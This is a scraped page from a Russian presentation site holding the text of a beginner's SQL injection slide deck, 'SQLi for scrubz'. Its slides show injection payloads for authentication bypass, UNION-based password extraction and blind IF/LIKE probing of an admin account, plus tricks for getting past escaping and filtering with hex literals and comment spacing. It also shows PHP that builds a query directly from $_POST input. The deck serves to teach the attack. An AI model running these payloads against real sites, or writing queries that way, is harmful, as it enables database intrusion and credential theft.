- Главная
- Разное
- Бизнес и предпринимательство
- Образование
- Развлечения
- Государство
- Спорт
- Графика
- Культурология
- Еда и кулинария
- Лингвистика
- Религиоведение
- Черчение
- Физкультура
- ИЗО
- Психология
- Социология
- Английский язык
- Астрономия
- Алгебра
- Биология
- География
- Геометрия
- Детские презентации
- Информатика
- История
- Литература
- Маркетинг
- Математика
- Медицина
- Менеджмент
- Музыка
- МХК
- Немецкий язык
- ОБЖ
- Обществознание
- Окружающий мир
- Педагогика
- Русский язык
- Технология
- Физика
- Философия
- Химия
- Шаблоны, картинки для презентаций
- Экология
- Экономика
- Юриспруденция
Что такое findslide.org?
FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.
Обратная связь
Email: Нажмите что бы посмотреть
Презентация на тему SQLi for scrubz
Содержание
- 2. Понятие таблиц и работа с нимиDatabase
- 3. СинтаксисКлючевые слова в запросеSELECT *column_name* FROM *table_name* WHERE *condition*
- 4. SELECT * FROM Коты WHERE Хозяин = "Саймон"SELECT * FROM Коты WHERE Возраст > 1 AND Возраст < 5
- 5. Таблица: dataСтолбцы: id, username, passЗапрос: SELECT *
- 6. Таблица: dataСтолбцы: id, username, passЗапрос: SELECT username FROM
- 7. Таблицы: data, private_dataСтолбцы: id, username, passЗапрос: SELECT
- 8. ФункцииLIKESELECT username FROM users WHERE pass LIKE '%qwe%'SELECT username FROM users
- 9. MIDMID(*value*, *number of starting symbol*, *hom many symbols*)MID('value',
- 10. GROUP BYSELECT * FROM users GROUP BY 1SELECT * FROM users GROUP BY 2
- 11. Экранирование символовЭкранирование символов — замена в тексте управляющих
- 12. Фильтрация символов0x74657874 = textSELECT * FROM users WHERE pass
- 13. Определение уязвимостиОбычный и слепой метод$name = $_POST['name'];$query
- 14. Скачать презентацию
- 15. Похожие презентации
Понятие таблиц и работа с нимиDatabase
1 AND Возраст < 5 ">
![Определение уязвимостиОбычный и слепой метод$name = $_POST['name'];$query =](/img/tmb/15/1478606/4a54195ef98a44cbc282c0b99a45a9a7-720x.jpg "SQLi for scrubz")
Слайд 4
SELECT * FROM Коты WHERE Хозяин = "Саймон"
SELECT * FROM
Коты WHERE Возраст > 1 AND Возраст < 5
Слайд 5
Таблица: data
Столбцы: id, username, pass
Запрос: SELECT * FROM
data WHERE id = '$text' AND id != 1
$text = ' or
id = 1 -- Простейшая уязвимость
Слайд 6
Таблица: data
Столбцы: id, username, pass
Запрос: SELECT username FROM data
WHERE id = '$text' and id != 1 ;
$text =
1' UNION SELECT pass FROM data WHERE id = 1 -- How to UNION
$text = ' UNION SELECT pass FROM data WHERE id = 1 --
Слайд 7
Таблицы: data, private_data
Столбцы: id, username, pass
Запрос: SELECT *
FROM data WHERE id = 1 and id = '$text'
;$text = ' UNION SELECT *,1 FROM data WHERE id = 1238 --
Слайд 8
Функции
LIKE
SELECT username FROM users WHERE pass LIKE '%qwe%'
SELECT username FROM users WHERE
pass LIKE '%qwe_'
IF
IF('pass' = 'pass', 1, 0)
IF((SELECT username FROM users
WHERE id = 1) = 'admin', 1, 0)IF((SELECT username FROM users WHERE id = 1) LIKE 'qwer%', 1, 0)
'%' - неопределённое кол-во символов
'_' - один символ
Слайд 9
MID
MID(*value*, *number of starting symbol*, *hom many symbols*)
MID('value', 3,
2) = 'lu'
MID('value', 1, 1) = 'v'
CONCAT
CONCAT('lu', 'l') =
'lul'SELECT id, CONCAT(username,' - ', pass) AS user_data
CONCAT('str1','str2',…,'strN') = 'str1str2...'
Слайд 11
Экранирование символов
Экранирование символов — замена в тексте управляющих символов
на соответствующие текстовые подстановки
Payload:
$text = ' UNION SELECT * FROM
users; -- $text = \' UNION SELECT * FROM users; --
\ => \\
$text = \\' UNION SELECT * FROM users; --
Слайд 12
Фильтрация символов
0x74657874 = text
SELECT * FROM users WHERE pass =
'text'
SELECT * FROM users WHERE pass = text
Ошибка при
выполнении запроса: «Unknown column 'text' in 'where clause'»SELECT * FROM users WHERE pass = 0x74657874
SELECT/**/*/**/FROM/**/users/**/WHERE/**/pass/**/=/**/0x74657874
/* - начало блока комментариев
*/ - конец блока комментариев
Слайд 13
Определение уязвимости
Обычный и слепой метод
$name = $_POST['name'];
$query =
"SELECT phone_number FROM users WHERE name = '$name'";
$result =
mysql_query($query);Real life example
